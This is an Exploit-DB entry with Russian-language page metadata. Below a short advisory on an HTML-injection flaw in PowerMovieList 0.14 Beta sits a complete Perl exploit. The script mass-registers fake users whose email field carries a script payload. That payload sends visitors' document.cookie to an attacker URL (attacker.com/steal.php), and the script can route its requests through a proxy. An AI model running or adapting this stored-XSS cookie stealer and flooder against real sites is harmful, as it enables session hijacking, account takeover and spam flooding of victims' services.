- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 28823
- Проверка EDB
-
- Пройдено
- Автор
- MP
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2006-10-16
Код:
source: https://www.securityfocus.com/bid/20564/info
PowerMovieList is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
#!/usr/bin/perl -w
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request::Common;
if (@ARGV < 6 )
{
print color 'bold green on_black';
print q(
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
## #
## [ PowerMovieList <= 0.14 Beta ] #
##
## Class: XSS Remote Cookie Disclosure Exploit && Flooder #
## Patch: Unavailable #
## Published 2006/10/16 #
## Remote: Yes
## Local: No #
## Type: High #
## Ext: Magic_quotes_gpc= On #
## Site: http://www.powermovielist.com/ #
## Author: MP
## Contact: [email protected] #
## #
###################################################################);
print ("\nArgs: 1-> pmlSite 2->AttackerSite 3->FakeUser 4->FakePass 5->FakeEmail 6->Times 7->Proxy\n");
print ("\n@> Example Without Proxy: \n");
print ("perl $0 http://victim.com/pml/ http://attacker.com/steal.php?c= PcFreakUser Password13 tsvete\@yahoo.com 10 \n");
print ("@> Example With Proxy: \n");
print ("perl $0 http://victim.com/pml/ http://attacker.com/steal.php?c= PcFreakUser Password13 tsvete\@yahoo.com 10 -P
200.88.223.98:80 \n \n");
print color 'reset';exit(1);
}
$mpbaumqu=LWP::UserAgent->new() or die;
if (grep/\-P/,@ARGV) { $mpbaumqu->proxy("http" => "http://$ARGV[7]");};
for ($times=1;$times<=$ARGV[5];$times++) {
$mpbaumqu->timeout(100);
$mpbaumqu->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20060902 Firefox/1.0.4 (Debian package
1.0.4-2sarge11)");
$mpbaumqu->request(POST "$ARGV[0]".'edituser.php?Active=index&Display=&&action=addsave&F=', ['name' =>
"$times"."$ARGV[2]", 'pass' => "$ARGV[3]", 'passrep' => "$ARGV[3]", 'email' => "<script>img = new Image(); img.src =
\""."$ARGV[1]"."\"+document.cookie;</script><"."$ARGV[4]"."$times"]);
};
- Источник
- www.exploit-db.com